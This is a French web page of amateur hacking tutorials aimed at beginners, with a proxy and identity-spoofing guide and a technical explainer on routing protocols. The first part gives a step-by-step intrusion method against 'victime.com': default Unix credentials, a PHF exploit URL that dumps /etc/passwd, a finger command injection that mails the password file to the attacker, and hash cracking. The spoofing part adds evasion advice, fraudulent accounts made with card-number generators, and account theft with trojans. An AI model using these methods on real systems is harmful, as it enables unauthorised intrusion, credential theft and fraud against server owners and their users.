"; ?> Document sans titre

   
     
     
   
             

[Je veux commencer par le début]

[Je connais deja et je veux aller + loin]


--------------------------------------------------------------------------------

INTRODUCTION:


Quelques commentaires sont necessaires avant de parler de techniques de hack.

Quand nous parlons de ‘Hacking’, nous parlons d'avoir un accés sur un serveur que nous n'avons pas.
Les serveurs sont configurés pour que plusieurs personnes puissent les utiliser.
Chaque personne a un compte (account) différent sur le serveur .
Si Fred à un account avec victime.com ISP (Internet Service Provider), il lui sera donné :

(1) un nom (login name) , qui est le même que son repertoire ; et
(2) un mot de passe (password) , qui lui donne l'accés à ce repertoire.

Le login name et le password donneront accés à tout les services de Fred - e-mail , news ,
services et pages web. Il y a aussi un account 'root' , qui a ses propres login et password.
Il donne un accés super-utilisateur au serveur tout entier. Nous allons nous pencher sur cette
possibilité dans ce guide.

[Ok, je veux aller jusqu'a 'anatomie du hack']

[ Je connais deja tout çà envoie moi directement au hack]


--------------------------------------------------------------------------------

L'ANATOMIE DU HACK :


Il y a deux manières de s'infiltrer dans un système. Imaginer un serveur comme le coffre fort
d'une banque suisse.Il y a deux moyens d'y entrer. Vous pouvez essayer en trouvant la combinaison
du coffre. C'est comme chercher un password.La seconde possibilité c'est d'utiliser la dynamite.
Vous oubliez toutes les manières‘propre’ pour vous infiltrer. C'est comme utiliser des ‘exploits’
ou passer par les points faible de l'OS du serveur pour y avoir accés.

[Ok, Let's Go! Mais dis moi je risque pas de me faire niquer ?]

[C'est bon je sais comment ne pas me faire niquer,c'est pour les newbies ce truc ?!]


--------------------------------------------------------------------------------

'NE PAS SE FAIRE NIQUER':


Le Hacking est illegal, et il est très facile de vous tracez si victime.com realize que vous
les avez hacker. Où que vous alliez,
votre adresse ip (l'identification unique de votre ordinateur) reste et est souvent loggé. Solutions:

1. Quand vous installer un compte avec un ISP, donner un faux nom et une fausse adresse. Ou,
mieux encore , signer pour un compte anonyme chez anonymizer.com ici.

[Nah,j'ai pas trop envie de faire çà , y a quoi comme autres trucs ?]

[Ok j'utilise deja cette arnaque que puis je faire d'autres ?]

[Stop ! Je sais DEJA comment ne pas se faire griller on passe à la technique ?]


--------------------------------------------------------------------------------

'NE PAS SE FAIRE NIQUER':

2. Hacker en utilisant un faux compte (password perdu, etc.). Un outil appelé Dripper peut
voler des passwords pour vous depuis des cybercafés ou des bibliothèques.

[Nah,dis moi juste quelque chose de facile que je peux faire maintenant !]

[Ok, c'est fait. Rien d'autre à faire ?]


--------------------------------------------------------------------------------

'NE PAS SE FAIRE NIQUER':

3. Pointer vos paramètres de connection ailleurs.

Vous pouvez le faire facilement en changeant vos paramètres Proxy. En utilisant les paramètres
d'un ISP different , çà fera style tu surfes par cet ISP là mais en fait non kapishé ?.
Une liste de proxies est dispo ici.

Si vous voulez le super anonymat ! ,
vous devriez surfer avec un compte enregistré sous un faux nom et avec vos paramètres proxy modifiés.
Vous pouvez aussi surfer a travers l'applet IP Jamming!.Soyez conscient que certains ISP peuvent
tester votre connection...a vous de voir.


[Ok, Je suis protéger à donf !... Now, I want to HACK!]


--------------------------------------------------------------------------------

RASSEMBLER DES INFOS:

Pour bien commencer, vous aurez besoin de recolter des informations a propos de www.victime.com
en utilisant des outils internet..

[Ok, Comment ?]

[Non, j'ai deja chopper toutes les infos , dis moi juste ce qu'il faut faire]


--------------------------------------------------------------------------------

LE CHOPPAGE D'INFOS:

Nous allons maintenant commencer par la première étape de tout bon hack qui se respecte....le
"le choppage d'info"

Prenez un calpin , et ouvrez une nouvelle fenetre de votre navigateur (par l'intermédiare de
l'IP Jammer). Allez sur le site www.victime.com . Vous pouvez trouver l'applet IP jamming sur
Cyberarmy.Com.

[Ok, et maintenant ?]


--------------------------------------------------------------------------------

IDENTIFIER VOTRE VICTIME:

1. D'abord allez sur le site "victime". Recopiez toutes les adresses e-mail présentes ,
copiez également le code HTML des pages importantes.

[ C'est fait quoi d'autres ?]


--------------------------------------------------------------------------------

L'ARNAQUE DE L'ERREUR DE MAIL:

2. Envoyer un e-mail a une personne inexistante . Si le site est www.victime.com ,
envoyer un mail à blahblahblah@victime.com . Un message d'erreur vous parviendra
par e-mail et contiendra des informations sur le serveur cible.

Recopiez ces infos.

(Pour garder l'anonymat, ce serai une bonne idée d'envoyer et de recevoir le mail par
l'intermédiaire d'un provider gratuit comme hotmail.com. Cela vous protegera quand ils
verifieront le log après que vous les ayez hacker.)

[C'est fait quoi d'autres ??]


--------------------------------------------------------------------------------

TRACEROUTE:

3. Toujours en gardant l'anonymat , tracer victime.com à l'aide du champs de recherche ci-dessous

Cela vous indiquera l'origine du provider du serveur de la victime.

TOOLS
NSLookup Whois Traceroute

[Ok, quoi ensuite ??]


--------------------------------------------------------------------------------

WHOIS:

3. Toujours en gardant l'anonymat, faites un Whois sur le site. La recherche Whois est
disponible ci-dessous.

Cela vous donnera des infos sur la personne qui possède le site et qui le fait tourner.

TOOLS
NSLookup Whois Traceroute

[Ok, quoi ensuite ??]


--------------------------------------------------------------------------------

L'OUTILS FINGER:

4. Maintenant nous allons utiliser l'outil Finger. D'abord utiliser le finger comme suit :
“finger @victime.com ”. Parfois cela vous donne les noms de tout les comptes présents sur le
serveur. Si cela ne marche pas , essayez le finger sur les adresses e-mail que vous avez chopper
sur le site et grâce à l'outil Whois. Cela vous donne parfois des infos très importantes pour la
suite des opérations.

FINGER
@

[Ok, quoi ensuite ??]


--------------------------------------------------------------------------------

LE SCAN DE LA MORT:

5. Maintenant nous allons scanner tout les ports du site.

Le scan permet de verifier tout les ports ouverts pour une IP. Cette étape est très importante,
cependant , cela préviens le webmaster que son site va se faire hacker. Il n'y a aucune raison
légitime pour scanner un site sauf si vous voulez le hacker :)

Il n'y a pas de techniques sures pour cacher un scan port , mais li existe quelques scanner
de port qui permettent cette option. La plupart sont seuleument pour les systèmes Linux / Unix .
Sinon , utilisez l' Exploit Generator pour Windows . Cependant , si vous voulez penetrez un site
TRES securisé , Nous vous conseillons d'oublier le scan pour le moment tant que vous vous serz
pas mis à Linux.

Ok ! , Le scan des ports vous permettra de savoir quels services le site est en train de faire
tourner. Si le port 21 est ouvert cela veut dire qu'ils ont un serveur FTP . Si le port 23 est
ouvert cela veut dire qu'ils ont TELNET.

[Ok, quoi ensuite ??]


--------------------------------------------------------------------------------

TELNET:

5. L'utilité de Telnet est qu'il permet de trouver à quel type de serveur vous avez affaire.
Vous pouvez utiliser le telnet (à 2 balles !) de zindaube où utiliser d'autres telnet que l'on
peut trouver un peut partout

Utilisez telnet sur le site cible par le port 23. Habituellement , si l'adresse est
“www.victime.com ”, essayez telnet avec "victime.com ". Si cela ne marche pas ,
essayez telnet avec telnet.victime.com ou essayez avec les diverses informations
que vous avez trouver plus haut . Une fois que vous y avez accés , notez toutes les
informations qu'ils vous donne notament le type de serveur.

[Ca marche ! j'ai le type de serveur !]

[Nop ! rien ne marche :(]


--------------------------------------------------------------------------------

TELNET:

Maintenant changez le port telnet au port 21. Cela va vous envoyer à leur serveur FTP.
Si çà marche essayez de taper SYST pour savoir de quel type de serveur il s'agit.

[CA marche !]

[Toujours pas :((]


--------------------------------------------------------------------------------

TELNET:

Maintenant si vous êtes chanceux mettez le port sur 80 (c'est le port HTTP).
Notez les informations reçues.

[Ouf ! çà marche enfin !]

[Je ne suis qu'un lame mais je veux perseverer !]


--------------------------------------------------------------------------------

UTILISER DES PROGRAMMES LAME:

Vous avez BESOIN de savoir de quel type de serveur il sagit avant de hacker quoi que ce soit.
Comment voulez vous ensuite utiliser des exploits si vous n'êtes même pas au courant du type
de la machine ??

Une des dernières solutions et d'utiliser un programme appelé Whats Running? Cela ne marche
pas très bien , mais défois il arrive à vous sortir le type de serveur. Il sera certainement
loggé sur le serveur de la visctime.

Si çà ne marche toujours pas demerdez vous pour trouver cette info ! sans çà pas de hack !.
Essayer aussi d'envoyer un e-mail en demandant quel type d'OS ils utilisent , des fois çà marche !!.

[Ok ! Maintenant j'ai les infos ! je veux avoir l'accès au serveur !]


--------------------------------------------------------------------------------

HACKER A PARTIR DU PASSWORD:

Maintenant nous allons essayer de trouver la combinaison du pass pour rentrer dans le serveur.

[Ok, Je veux être root !!]

[Nah, je sais deja que ce serveur va necessiter un "exploit"]


--------------------------------------------------------------------------------

D'ABORD ESSAYER DES TRUCS SIMPLES:


Unix s'installe avec des pass par défaut et parfois ils ne sont pas changés. Alors ,
on telnet victime.com .

Utilisez un autre Telnet que celui de windaube car sinon votre adresse ip sera
loggée par victime.com .
Ensuite essayez les accounts et pass suivants :

ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon

Les accounts root, mountfsys, umountfsys, install, sont des acconts root ,
ce qui veut dire qu'ils vous permettrent d'être le "super utilisateur" de
la bécane et d'avoir tout les pouvoirs. Les autres logins sont juste "user level"
ils ont un accés limité a leurs fichiers et services.

[Nup...çà marche po !]

[Incroyable ! ce truc de lamer fini fonctionne à merveille !]


--------------------------------------------------------------------------------

UTILISER LES NOMS COMME LOGIN ET PASSWORD:

Encore un truc simple. Entre 1 et 20 personnes par serveur sont assez stupides pour avoir le même
login et password.Utilisez les informations que vous avez choppées avec les adresses e-mail et
le Whois.

Par exemple si le site web fait référence à robert @victime.com ,
essayer de vous logger (par Telnet ou FTP
) comme:

$Login: Fred
$Password: Fred

Faites çà avec tout les noms que vous avez trouver - vous pourriez être chanceux :)).

Ca marche ?

[Nah,ils ont une putain de sécurité çà ne marche pas ! ]

[Oh, cool ! j'ai accés à un account !!]


--------------------------------------------------------------------------------

CHOPPER LE FICHIER PASSWD

Vous n'avez probablement pas de chance jusqu'a maintenant.

Admettons que vous essayer de penetrer un système UNIX , maintenant
il faut vous interessez à comment le sytème VERIFIE le password que vous lui indiquer.
Il y a un fichier appelé ‘passwd’ sur tout les systèmes UNIX ce fichier contient tout les
password pour tout les utilisateurs.Donc si vous ne pouvez pas deviner le password ,
nous allons essayer de chopper ce fichier et de le decrypter.

[Ok ! allons y !]


--------------------------------------------------------------------------------

ANCIENNE METHODE CHINOISE PAR FTP:

Votre browser devrait être configuré pour utiliser de faux proxy. Nous utiliserons ce même browser
pour le FTP , car il ne peut pas être tracer facilement , alors qu'un programme comme CUteFTP peut
être tracer car il ne peut pas utiliser de faux proxy.Si dans votre scan vous avez trouver le
port 21 ouvert c'est une très bonne indication car cela veut dire que la victime a un serveur FTP.

Utilisez votre browser , essayez en FTP avec victime.com . Exemple: ftp://victime.com

Si cela ne marche pas , essayez toujours en FTP avec ftp.victime.com . Exemple: ftp://ftp.victime.com

Si çà ne marche pas, essayez avec FTP les noms de domaines des serveurs que vous avez chopper
avec la recherche Whois. Exemple: ftp://ns1.victime.com

[Ok, j'y suis !]

[Nah, çà marche pas et çà commence à prendre la tête , mais je vais quand même le faire :)) ! ]


--------------------------------------------------------------------------------

ANCIENNE METHODE CHINOISE PAR FTP:

Maintenant que vous êtes connecté au serveur FTP de victime.com , clikez sur le repertoire /etc.

Vous devriez voir un fichier nommé ‘passwd’et peut être aussi un fichier appelé ‘group’.
Downloader le fichier ‘passwd’ file et mattez le.

Si vous êtes chanceux il devrait ressembler à çà :

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]

Par exemple ,nous voyons qu'il y a un loggin “kangaroo” et son password crypté
est “3A62i9qr”. Note -ce n'est PAS son password mais une forme CRYPTE de son pass.

Ou alors ce la ressemble plutot à çà :

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

Si la section du pass est formé par des * ou des x , c'est mauvais !–
on dit que le fichier passwd est shadowed
les pass ne peuvent être decryptés dans ce cas là. Aujourd'hui la plupart
des fichiers passwd sont shadowed.Cependant , si vous avez un
fichier passwd qui est non-shadowed , vous pouvez le decrypter ! .


[Nah, mon fichier passwd est complétement shadowed]

[Nah, je ne trouve pas le fichier passwd]

[Cool ! je suis tombé sur un fichier non-shadowed]


--------------------------------------------------------------------------------

DECRYPTER UN FICHIER PASSWD:

il y a pleins de programmes sur le net qui permettent de cracker des password Unix on les
appelle des "password cracker" . Le plus connu est ‘Cracker Jack’.Beaucoup de e-mag recommande
ce programme mais c'est plus par tradition que par efficacité !. Ce programme est vieux et crash
encore beaucoup de machine , car il utilise des allocations mémoires.

Le meilleur password cracker du moment est 'John the Ripper 1.5’. Il est facilement trouvable.
Il est très rapide et même optimisé pour PII et K6-2. John the Ripper utilise la
"brute force attack". Mais il ne tourne que sous MS-DOS.

Vous aurez aussi besoin d'un ‘wordfile’, il s'agit d'un fichier contenant des mots ,
le cracker va utiliser ce fichier pour cracker des mots de pass. Plus la wordlist est BIG
plus le cracker as de chance de trouver les password.

[Oui ! j'ai récupperer des pass!]

[Nah, le cryptage est trop balèze !]


--------------------------------------------------------------------------------

LA TECHNIQUE OLD-STYLE DU PHF :

Aujourd'hui la plupart des serveurs ont supprimé leur programme PHF, testez quand même :)...
si çà marche vous pourrez chopper le fichier passwd, même si il est caché ou reservé à l'accés root.

Dans l'Overlord Anonymizer , tapez::

http://www.victime.com /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.

OVERLORD ANONYMIZER

Si PHF est actif (souvent il ne l'est plus), toutes les infos s'afficherons dans votre navigateur !.

[Nah, ils ont grillé le bug PHF depuis 10 ans man !]

[Yes! j'ai choppé quelques pass crypté !!]


--------------------------------------------------------------------------------

FINGER BOX HACKING:

Les serveurs Finger sont les mais des hackers !. Nous allons capté si www.victime.com à un
serveur finger.

Dans l'Anonymizer tapez www.victime.com /cgi-bin/finger

OVERLORD ANONYMIZER

Si çà marche vous avez encore une chance de récupperer le fichier etc/passwd.

Ok !, 1/ prenez votre calepin ou vous avez noter les adresse e-mail du site
(admettons q'une de ces adresses soit "kangaroo@victime.com "et que votre adresse e-mail est
"your@email.org")

2/ Retournez a la finger box, et tapez ceci : (en changeant les adresses e-mail par les reelles !
on sait jamais , lame is lame :))):

kangaroo@victime.com ; /bin/mail your@email.org < etc/passwd

Ce truc va chopper le fichier passwd par kangaroo@victime.com et vous l'envoyer a VOTRE
adresse e-mail !. Si çà marche vous avec le fichier passwd dans votre box !....
Vous pouvez maintenant lancer un password cracker pour le decrypter.

[Nah, çà marche pas]

[Oui ! j'ai enfin choppé ce fichier !]


--------------------------------------------------------------------------------

FELICITATIONS !:

Vous avez accés au serveur !.

Maintenant si vous avez un login et un pass , vous pouvez utiliser le compte mail de l'utilisateur,
utiliser le FTP et modifier les pages web du serveur !

Voila c'est la fin de ce tutorial , j'espère qu'il vous aura aider ! Dans le cas contraire ,
si votre cible est la nasa ou les lanceurs Arianne , patientez un petit peu pour la section Linux
qui débarque bientôt ! N'oubliez pas que sous zin le hacking est très limité !!!

www.cyberarmy.com

 

Le spoofing, ah la grande question que beaucoup de monde se pose !
Je vais ici vous expliquer de nombreuses techniques que se soit pour irc, http ou ftp ou encore gopher.
Enfin je vais essayer d’être complet.

Le spoofing c’est l’art d’avoir une fausse identité sur le net. Avoir une fausse IP,
faux pseudo, faux mail, faux account etc…

1). les IP :

Premièrement, la partie la plus connue du spoofing, la dissimulation d’ip. Comment qu’on fais ?
et bien on utilise des proxy ou des wingates. Les proxy et les wingates sont des serveurs permettant
une redirection de ports. Autrement dis vous entrez dans un ordinateur par un port et vous en ressortez
par un autre pour finalement aller ou vous voulez. Le proxy ou la wingate fais un rôle d’intermédiaire
entre vous et votre destination finale. Ok ?

Donc vous serez anonyme au point de vu de votre ip. Les proxy servent en général pour le http,
ftp et éventuellement gopher. Les wingate sont plus utiliser pour l’ IRC.

Et ouaip c’est très utile d’avoir une fausse ip sous irc, ça vous permet d’éviter
les nukes ou les floods. Pour cela c’est le même principe que pour les proxy sauf
qu’il s’agit d’une wingate.

INTERNET <—> PROXY <—> VOUS

Comment qu’on fait ?

Vous aller me dire mais comment trouver une wingate ou un proxy et comment l’utiliser ???
et bien c’est assez simple :
Pour les proxy vous aller avoir besoin d’une liste initial que vous trouverez sur cyberarmy
ou un peu sur mon site. Donc vous vous faites une petites liste de proxy (env 50 à 100) dans
un fichier txt et vous aller devoir scanner. Aller dans la partie downloads de mon site et
télécharger un scanneur de proxy. Le scanneur va vous dire tous les proxy bon à prendre dans
votre liste, mais ceci ne signifie pas qu’ils marcheront !

Donc une fois votre liste de « bon » proxy obtenu et bien déconnecter vous et aller dans les
propriété de IE, dans connexion et choisissez votre connexion puis cliquez sur propriété.
Maintenant cocher la case utiliser un proxy et remplissez les cases en dessous par les infos
que vous aurez trouver avec le scanneur (adresse et port). Voilà, maintenant vous vous reconnecté
avec cette connexion et vous lancer IE. Si vous arrivez à afficher une page d’un site et bien c’est
bon signe, pour vérifier et bien venez sur mon site et regarder sur la page d’accueil si l’ip afficher
et la votre ou non.

Si vous arrivez pas à obtenir l’affichage d’une page et bien refaire la manipulation avec un autre
proxy trouver dans le scanneur.

Ensuite y a une deuxième méthode pour obtenir un proxy. Vous en installer un sur un ordi d’un
gas et vous utiliserez sont pc en tant que proxy. Vous trouvez sur le net un proxy à installer
(arf g pas d’adresses en tête) et vous faites un peu de SE pour que un gas l’installe.
Une fois que le gas c’est installé un proxy et bien il ne vous reste plus qu’a utiliser
sont ordi en tant que proxy, vous avez juste besoin de son ip et de savoir quel port votre
proxy a ouvert. Pour utiliser le proxy et bien c’est la même méthode que celle décrite au dessus.

Pour IRC : et bien vous avez besoin d’un scanneur de wingates (cf partie downloads).
Scanner sur le port 23, 1080 ou 3128 parfois 8080. une fois que vous avez trouver une
wingate et bien lancer Mirc et aller dans connect/firewalls cocher la case en haut et
entrer les infos sur la wingate dans les cases appropriées. Ensuite tenté une connexion.
Si ça marche et bah tant mieux et dans le cas contraire ça peut vous dire : *** firewall :
unknown responce ou un truc dans le genre, dans ce cas et bien déconnectez vous et recommencer
avec une autre wingate, jusqu'à en trouvez une qui marche.

Je vous conseil de faire une petite réserve de wingate car vous devrez probablement en changer tous les jours.

Ya une autre méthode pour obtenir des wingates. Vous chercher directement sur irc des gas qui ont le câble. Vous faite un /dns pour avoir leur ip et vous essayer de vous connecter par son ordi, en gros son ordi est la wingate. Mais faut que le port 23 soit ouvert et c’est pas sur que ça marche, mais parfois ça marche !

2). Les pseudos

Le choix est la manipulation de pseudos paraît très simple mais en fait, ce n’est pas le cas. Il est toujours bon d’avoir plusieurs pseudos. Un pour le public (moi c The JokeR), c’est par ce pseudo que l’on vous connaîtra sur le net, c’est le pseudo que vous utiliserez pour envoyer des mails à vos pots etc…, ensuite il faut un deuxième pseudo qui servira de nom de guerre pour signer vos hacks. Ce pseudo personne ne doit le connaître a part vous, ni proche, ni hackers, ni parents, que VOUS !!! ainsi si vous faîtes un hack et qu’on va vous chercher sur le net, sur irc ou encore que les keufs (DST) demande a des hackers « balance » qui vous êtes etc… et bien ils trouveront rien puisque personne ne connaît votre pseudo de guerre ! Ensuite il vous faut 2 autres pseudos, un bidon qui vous sert de temps en temps sur IRC et un autre qui peut vous servir pour mettre dans des greets ou des trucs comme ça. Mais bon c’est pas tellement nécessaire.

Enfin dites vous que plus vous avez de pseudo et plus les piste seront brouillées.

Par exemple vous posez une question sur Mysql sur un forum, faites le avec un pseudo, ensuite si vous posez le même genre de question sur IRC et bien faites le avec un autre pseudo et pour le hack signé avec un troisième pseudo. Certain vont me dire que je suis grave parano et que ça sert a rien, et bien c’est peut être vrai mais vaut mieux l’être trop que pas assez !!

Le plus dur n’est pas le choix des pseudos mais c’est bien de séparer tous les pseudos, que chaque pseudo soit une vie différente. Et ça croyez moi c’est extrêmement dur, moi j’y arrive pas !

Par exemple vous laissez un message sur un forum avec un pseudo et vous répondez au gas par mail avec votre vrai pseudo parce que vous avez pas penser a changer votre mail d’envoi dans outlook. Ce genre de plantage arrive souvent et la confusion devient très rapide !

Très vite quand on vous mail vous ne savez plus sous quel pseudo vous connaît la personne et avec le quel vous devez lui répondre.

Pour remédier a ce problème et bien faite vous autant d’identités sous Outlook que de pseudos, autant de mails que de pseudos etc… chacun doit être indépendant. Et avant chaque connexion vous devez choisir le pseudo avec le quel vous vous connecté et ne pas en changer en cours de route sauf si vous êtes sûr de vous. Ça paraît un peu barbare mais c’est le meilleur moyen de pas se planter. Une fois qu’un pseudo est grillé et bien il faut rechanger.

3). Les mails :

Bon la ça va être très court ! déjà et bien avoir plusieurs mail comme dis au-dessus. Et puis pour vous faire passer pour quelqu’un d’autre et bien utiliser un fake mail ou anonymail (cf partie downloads). On ne peut pas appeler ça du spoofing mais bon on je le fou la quand même, je vais pas chier un cake pour 3 lignes !!

4). Faux account :

Avoir un faux account peut s’avérer également utile pour brouiller les traces.
Soit vous ouvrez un account de connexion avec un faux n° de CB ou bien vous en piquez.
Bien que suis totalement contre le vol d’informations, et bien d’en certains cas ça sert.
Enfin éviter quand même. Pour choper des acounts et bien soit vous sortez un générateur de
n°CB et vous vous inscrivez à wanadoo ou bien vous utiliser un trojans (comme sub7) et vous
chopper des connexions.

Avant de vous connectez faites quand même le 3651.

5). CONCLUSION :

Je vous est présenter ici des techniques de spoofing pour le surf de
tout les jours et non pour un hack, donc n’utiliser pas ça pour faire un hack,
ça serai beaucoup trop insuffisant (enfin ça dépend de la cible).

Etant donné le peu de docs sur les routeurs, je me suis décidé a écrire quelque chose.
Bon cet article ne sera pas vraiment tourner hack, mais je vais plutôt vous présenter les routeurs,
leurs fonctionnement etc…

Le routage

Le routage est une opération réalisée par la couche transport du modèle IP ( ou IPX) qui consiste
à transmettre un paquet vers une direction ou une autre en fonction de son adresse de destination
et du contenu des tables de routage. Pour qu’un nœud soit déclaré en routeur, il doit disposer
d’au moins deux rattachements à des réseaux (ou sous-réseaux) différents. L’opération de routage
(c’est à dire comment la destination est choisie) se concrétise par la sélection d’un port
d’entrée/sortie et la mise à jour des tables. Elle est définie par des familles d’algorithmes
dont les objectifs sont de choisir :

— la route la plus économique ;
— la route la plus rapide ;
— la route la plus sûre.

Les principes du routage

Le routage est en général une opération qui concerne la couche 3 de l’OSI, mais, pour répondre aux besoins de la réalisation de réseaux locaux, on a donné la possibilité à la couche MAC d’effectuer du routage à ce niveau. Il est réalisé par une machine désignée sous le nom de routeur qui est :

— soit un équipement spécialisé ;
— soit une station Unix configurée comme telle ;
— soit encore un serveur Novell ou une station TCP/IP

le routage désigne l’opération exécutée par le logiciel d ‘un routeur (ou un équipement se comportant comme tel) ; il consiste à lire les adresse de destination des paquets (information de niveau 3), à choisir le cheminement qui permettra d’adresser ceux-ci et à permettre aux trames de passer au travers de deux ponts reliant deux brins de réseau. Pour réaliser cette fonction, trois techniques ont été élaborées :

— celle du pont « transparent »
— du Source Routing Bridge
— et celle du STR (Source Routing Transparent Bridge)

Dans tous les cas le processus de routage est entièrement automatique.

Le fonctionnement des routeurs

La fonction routage est particulièrement simple à mettre en œuvre, mais elle comporte une limite importante : c’est une opération qui s’effectue au niveau 3 du modèle (c.à.d des couches contrôles de liens) et certains protocoles ne sont pas routables comme les protocoles SNA (Systems Network Architecture), APPN (Advanced Peer-to-Peer Networking) , LAT ou Netbios. La grande différence avec un pont réside dans le fait que le routeur travaille sur des informations niveau paquets. Pour réaliser sa fonction le routeur doit constituer et maintenir des tables de routage continuellement mise a jour ; ce processus et celui du choix des routes à prendre s’effectuent dans le cadre d’un algorithme qui lui est propre. Dans la mesure où ils sont capables d’effectuer des opération de délestage automatique, les routeurs effectuent des opérations infiniment plus complexes que les ponts.

Les protocoles de routage : le routage désigne l’opération qui consiste à acheminer un paquet de données vers une direction en fonction de l'adresse de destination du paquet. La question qui se pose est la suivante : comment sont construites les tables de routage et quelles sont les informations qui la composent ? Pour qu'une opération puisse se réaliser, deux conditions sont à remplir :

— le paquet doit être géré par un protocole routable ;
— le nœud doit être en mesure de supporter au moins un protocole de routage.

Le principe consiste, pour chaque routeur, à gérer des tables de routage en précisant l'adresse du réseau de destination, le nombre de nœuds à traverser pour l'atteindre, et l'adresse du port permettant l'accès du nœud. Tous les protocoles de transport ne sont pas routables (par exemple les protocoles SDLC [Synchronous Data Link Control]. LAT et DECNET [Digital Equipment Corporation NETwork] ne le sont pas directement); pour qu'ils le soient, deux conditions doivent être remplies :

— le noeud doit comporter une fonction routage qui soit en mesure d'assurer l'implémentation de l'algorithme, les manipulations et les mises à jour des tables ;
— le paquet à router doit comporter toutes les informations pour la réalisation de l'opération (c'est-à-dire la disponibilité des adresses de destination).

Le rôle du routage est de déterminer le meilleur chemin à prendre pour accéder à un point. Les algorithmes de routage sont nombreux, et certains ne sont pas encore publiés; il est cependant possible de les classer en deux familles :

— le routage interne ;
— le routage externe

Routage interne : Un protocole de routage est dit « interne » (au sens TCP/IP) lorsqu'il est propre à un système autonome. Un tel système dépend d'un seul administrateur de réseau; il a la charge de choisir les protocoles et de donner une vision homogène de l'ensemble.RIP (Routing Information Protocol) est le plus couramment utilisé ; il a été mis au point à l'Université de Berkeley sur la base de recherches effectuées à Palo Alto et doit son succès à sa diffusion - pratiquement universelle - sur tous les centraux Unix ou TCP,IP. Son principe consiste à chercher la meilleure voie possible - estimée en nombre de passerelles

(Hop) - à traverser. La principale critique qu'on peut lui adresser tient au fait que son nombre de nœuds est limité (maximum 15) et que son choix des routes ne tient pas compte de la qualité des lignes et de leur charge. Dans la pratique, RIP est implémenté par défaut sur tous les nœuds. Issu de la technique dite de «vecteur distant », ce protocole est basé sur une classification des nœuds en « non actifs » et «actifs» (si une passerelle est active, elle propage les routes qu'elle connaît vers les autres, ce qui leur permet de mettre à jour leurs tables de routage). HELLO se base sur la notion de temps d'acheminement des paquets ; son principe consiste à mesurer le temps nécessaire à un paquet pour aller vers un nœud de destination et de choisir la route la plus rapide. SPF (Shortest Path First) est destiné aux réseaux de grandes dimensions et a un principe équivalent à celui de RIP. OSPF (Open Shortest Path First) n'est pas encore, à ce jour, un protocole disponible pour tous les systèmes. Comme RIP son principe consiste à choisir la route la plus courte mais en y incluant les notions de qualité et de coût des lignes, ce qui lui permet de, déterminer plusieurs chemins possibles pour une même destination.

Routage externe : Les protocoles dits « externes » - ou EGP (Exterior Gateway Protocol) - sont décrits par le RFC 1163. Implémentés dans des passerelles se chargeant d'établir la communication, ils permettent un routage entre domaines autonomes, c'est-à-dire entre deux réseaux (ou ensemble de réseaux) dépendant d'administrations différentes. On désigne sous le nom de voisins externes (Exterior Neighbour) deux passerelles en relation directe mais appartenant à deux domaines différents. C'est le protocole EGP qui se charge d'échanger des informations au travers de ces passerelles et assure trois fonctions essentielles :

— Acquérir le voisin (Neighbour Acquisition), c'est-à-dire permettre à une passerelle de demander une autorisation d'échange à une autre. Cette action se déroule par émission d'un message EGP suivant une périodicité désignée sous le nom de Hello Intervall.
— Surveiller constamment la disponibilité des passerelles EGP, c'est-à-dire interroger périodiquement leurs voisines en leur transmettant une trame d'interrogation Poll. Cette procédure, apparemment complexe, permet de désynchroniser le processus de calcul de la route de celui du transfert (ce qui a pour effet de produire un meilleur rendement de la communication).
— Mettre à jour les tables de routage (ce qui consiste - pour deux passerelles - à échanger des informations sur celles de leurs propres domaines, mais également sur les passerelles donnant accès à d'autres [si elles en ont connaissance]).

Les mécanismes de routage : La mise en place de mécanismes de routage pose deux problèmes de construction :

— quelles sont les informations à mettre dans les tables de routage ? ;
— comment - dans la mesure où la performance du réseau a un objectif constant - obtenir ces informations ?

Le principe de leur construction reste celui de la passerelle et se présente comme un nœud installé entre les réseaux. Le routage s'effectue à partir des informations figurant dans les tables ; ces dernières contiennent les adresses du réseau (en fait d'autres passerelles) et celles des routes dites « par défaut » (c'est-à-dire des adresses de passerelles).

Les algorithmes de routage. Le choix, par les organismes de normalisation, d'un algorithme de routage qui soit performant et économique est au cœur d'enjeux industriels qui concernent un marché en pleine expansion. Les algorithmes sont construits sur

deux principes de base :

— le routage par vecteurs distants ;
— le routage LSR (Link State Routing).

L'objectif est de trouver le cheminement le plus rapide, à un instant donné, pour qu'un paquet puisse atteindre son nœud de destination.

Routage par vecteurs distants. Le principe des algorithmes de vecteurs distants consiste à construire, pour chaque nœud, une métrique qui soit composée du nombre de passerelles nécessaire pour atteindre un nœud. Le processus de calcul de la route s'effectue selon les phases suivantes :

— Chaque routeur dispose de son propre identificateur.
— Chaque routeur identifie le coût de la ligne le raccordant au prochain routeur, la valeur étant traduite par un entier dont le plus petit est l.
— Chaque routeur commence par évaluer son vecteur distant à la valeur 0 pour lui-même et infinie pour ses voisins.
— Chaque routeur transmet à ses voisins son vecteur distant, lequel met à jour ses tables de routage.
— A partir des informations reçues, chaque routeur calcule la distance minimum, exprimée en nombre de nœuds.

Ces informations sont mises à jour périodiquement, chaque fois qu'une nouvelle destination est rencontrée ou qu'un vecteur distant, pour une même destination, est constaté par le routeur.

Routage LSR. L'idée de base du Link State Routing est que chaque nœud dispose d'une topographie du réseau constituée par les ponts-routeurs régulièrement mise à jour. Le principe de son fonctionnement est le

suivant :

— Chaque routeur se charge de rencontrer ses voisins et d'enregistrer leurs noms dans ses tables.
— Chaque routeur construit une table désignée sous le nom de LSP (Line State Racket) qui contient la liste et les noms des destinations.
— Le LSP est transmis à tous ses voisins, lesquels construisent une table de tous ceux qu'ils ont reçus.
— Quand tous les LSP sont arrivés, le routeur construit un graphique à partir duquel on peut déterminer la meilleure destination possible en appliquant l'algorithme de Dijkstra.

Le routage multiprotocoles.

